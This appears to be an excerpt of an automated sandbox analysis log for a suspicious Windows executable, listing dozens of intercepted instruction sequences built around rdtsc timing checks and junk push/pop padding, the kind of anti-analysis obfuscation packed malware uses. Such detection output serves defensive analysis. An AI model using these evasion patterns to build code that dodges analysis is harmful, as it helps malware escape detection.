Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F84AF4 second address: F84B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F577C5415D9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F84B13 second address: F84B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F84C98 second address: F84CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jng 00007F577C5415D2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F84CA5 second address: F84CAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F84CAB second address: F84CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F371D1 second address: F371D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F850BB second address: F850BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F838EA second address: F83907 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD3h 0x00000007 jbe 00007F577C53EFC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F83907 second address: F83927 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F577C5415CDh 0x00000008 jp 00007F577C5415C6h 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F89EBC second address: F89EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F89EC2 second address: F89F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F577C5415D6h 0x00000009 popad 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 jmp 00007F577C5415D6h 0x00000015 push eax 0x00000016 push edx 0x00000017 jc 00007F577C5415C6h 0x0000001d push edi 0x0000001e pop edi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F8D0F0 second address: F8D0F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F8D0F6 second address: F8D101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F8D101 second address: F8D117 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F8D117 second address: F8D120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F8D120 second address: F8D12D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F8D12D second address: F8D131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F8D131 second address: F8D141 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F577C53EFC6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F8D141 second address: F8D145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F9280D second address: F92813 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F92813 second address: F92819 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F92819 second address: F92823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F577C53EFC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F92823 second address: F92829 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F92829 second address: F9283F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F577C53EFCCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F9283F second address: F92845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F92845 second address: F92849 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F92849 second address: F9284F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F91B77 second address: F91B7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F91B7D second address: F91B88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F920CE second address: F920D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F920D3 second address: F920DD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F577C5415DDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F920DD second address: F920F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F577C53EFD1h 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F3671A second address: F36720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F5710E second address: F57112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F573E1 second address: F573E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F573E7 second address: F573EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F573EB second address: F57413 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 jmp 00007F577C5415CCh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F57541 second address: F57545 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F57545 second address: F5754B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F57667 second address: F5766D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F57663 second address: F57667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F57FA2 second address: F57FA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F57FA6 second address: F371D1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F577C5415C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F577C5415C8h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 movzx edi, ax 0x0000002b call dword ptr [ebp+12A03779h] 0x00000031 jmp 00007F577C5415CEh 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 je 00007F577C5415C6h 0x0000003f jmp 00007F577C5415D0h 0x00000044 popad 0x00000045 push ecx 0x00000046 push ecx 0x00000047 pop ecx 0x00000048 pop ecx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F960C0 second address: F960C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F960C4 second address: F960D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F577C5415CBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F960D8 second address: F960DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F9621D second address: F96245 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F577C5415C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d ja 00007F577C5415C6h 0x00000013 push edx 0x00000014 pop edx 0x00000015 jmp 00007F577C5415CCh 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F96245 second address: F96249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F963A9 second address: F963AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exe | RDTSC instruction interceptor: First address: F963AD second address: F963CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F577C53EFDBh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F96527 second address: F9652C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F96716 second address: F9671A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F9671A second address: F96725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F96725 second address: F9672A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F9685B second address: F96865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F577C5415C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F96865 second address: F968A8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F577C53EFCAh 0x00000008 push edi 0x00000009 jmp 00007F577C53EFD3h 0x0000000e jg 00007F577C53EFC6h 0x00000014 pop edi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a jmp 00007F577C53EFD6h 0x0000001f pop edi 0x00000020 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F968A8 second address: F968AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F96BBA second address: F96BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F577C53EFCCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F96BC7 second address: F96C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F577C5415D8h 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F577C5415D0h 0x00000014 pushad 0x00000015 jne 00007F577C5415C6h 0x0000001b jmp 00007F577C5415D1h 0x00000020 jmp 00007F577C5415CFh 0x00000025 jg 00007F577C5415C6h 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F96C14 second address: F96C20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F577C53EFC6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F96C20 second address: F96C24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F96C24 second address: F96C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F577C53EFC6h 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F99FAC second address: F99FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F0E99F second address: F0E9B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F0E9B5 second address: F0E9B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F0E9B9 second address: F0E9E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F577C53EFD5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F577C53EFD0h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F0E9E7 second address: F0EA0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F577C5415C6h 0x0000000a jmp 00007F577C5415D3h 0x0000000f popad 0x00000010 jc 00007F577C5415DCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F99BF1 second address: F99BFB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F99BFB second address: F99C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F99C01 second address: F99C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F99C05 second address: F99C09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F9C5B1 second address: F9C5B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F9C5B6 second address: F9C5BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F9C5BE second address: F9C5CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F577C53EFC6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F9C5CD second address: F9C5D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F9C5D1 second address: F9C5E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F9C197 second address: F9C1A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F577C5415C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F9C1A1 second address: F9C1A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F9C1A5 second address: F9C1AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F9C1AB second address: F9C1B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA1531 second address: FA1557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F577C5415D8h 0x0000000b js 00007F577C5415C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA169D second address: FA16F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F577C53EFD1h 0x0000000a pushad 0x0000000b jmp 00007F577C53EFD8h 0x00000010 jnl 00007F577C53EFC6h 0x00000016 jmp 00007F577C53EFD4h 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jp 00007F577C53EFCEh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA16F8 second address: FA1710 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F577C5415D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA188C second address: FA1895 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA1895 second address: FA189D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F578CD second address: F578EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F577C53EFD3h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F578EE second address: F578FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F578FC second address: F57906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F577C53EFC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F57906 second address: F5790A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5790A second address: F5795F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dx, 1D68h 0x0000000d mov ebx, dword ptr [ebp+12BBAA27h] 0x00000013 sub dword ptr [ebp+12BAA654h], esi 0x00000019 add eax, ebx 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007F577C53EFC8h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 jno 00007F577C53EFD2h 0x0000003b nop 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5795F second address: F57963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F57963 second address: F57971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F577C53EFCCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F57971 second address: F5797D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c rdtsc
